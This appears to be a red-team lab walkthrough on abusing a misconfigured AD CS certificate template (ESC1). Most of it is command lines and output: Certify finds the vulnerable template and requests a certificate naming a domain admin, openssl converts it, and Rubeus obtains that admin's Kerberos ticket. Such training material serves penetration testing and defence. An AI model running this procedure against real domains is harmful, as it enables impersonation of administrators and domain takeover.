Misconfigured Certificate Templates
AD CS certificate templates are provided by Microsoft as a starting point for distributing certificates. They are designed to be duplicated and configured for specific needs. Misconfigurations within these templates can be abused for privilege escalation.
Certify can also find vulnerable templates.
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
\

\
Let's go through the key parts of this output.
This template is served by sub-ca.
The template is called CustomUser.
ENROLLEE_SUPPLIES_SUBJECT is enabled, which allows the certificate requestor to provide any SAN (subject alternative name).
The certificate usage has Client Authentication set.
DEV\Domain Users have enrollment rights, so any domain user may request a certificate from this template.
If a principal you control has WriteOwner, WriteDacl or WriteProperty, then this could also be abused.
\
This configuration allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for authentication. Request a certificate for nlamb.
beacon> getuid
[*] You are DEV\bfarmer
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb
[*] Action: Request a Certificates
[*] Current user context : DEV\bfarmer
[*] No subject name specified, using current context as subject.
[*] Template : CustomUser
[*] Subject : CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] AltName : nlamb
[*] Certificate Authority : dc-2.dev.cyberbotic.io\sub-ca
[*] CA Response : The certificate had been issued.
[*] Request ID : 11
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:05.4521116
\
Copy the whole certificate (both the private key and certificate) and save it to cert.pem
on Ubuntu WSL. Then use the provided openssl
command to convert it to pfx format.
ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: pass123
Verifying - Enter Export Password: pass123
\
Convert cert.pfx
into a base64 encoded string so it can be used with Rubeus
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0
MIIM7w[...]ECAggA
\
Then use asktgt
to request a TGT for the user using the certificate.
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap
[*] Using PKINIT with etype rc4_hmac and subject: CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGQj[...]5pbw==
ServiceName : krbtgt/dev.cyberbotic.io
ServiceRealm : DEV.CYBERBOTIC.IO
UserName : nlamb
UserRealm : DEV.CYBERBOTIC.IO
StartTime : 9/7/2022 8:51:22 AM
EndTime : 9/7/2022 6:51:22 PM
RenewTill : 9/14/2022 8:51:22 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : AliVFc5Nk93Z7IUkweCnBQ==
ASREP (key) : 4DB9D9D76701696109C28A26D27DE0B0
Last updated